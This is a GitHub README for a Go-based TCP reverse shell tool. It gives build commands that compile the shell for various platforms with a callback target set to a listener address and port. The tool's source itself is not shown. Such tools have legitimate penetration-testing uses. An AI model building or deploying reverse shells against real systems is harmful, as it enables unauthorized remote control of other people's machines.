Skip to content

Files

Latest commit

b63378d · Jan 12, 2024

History

History
18 lines (12 loc) · 329 Bytes

File metadata and controls

18 lines (12 loc) · 329 Bytes

TCP reverse shell in Go

A reverse shell that can be compiled to all architectures supported by Go.

Usage

List supported platforms.

go tool dist list

Compile static binary.

./build.sh GOARCH=arm GOOS=linux TARGET=192.168.0.128:9999
./build.sh GOARCH=amd64 GOOS=windows TARGET=10.10.10.42:9999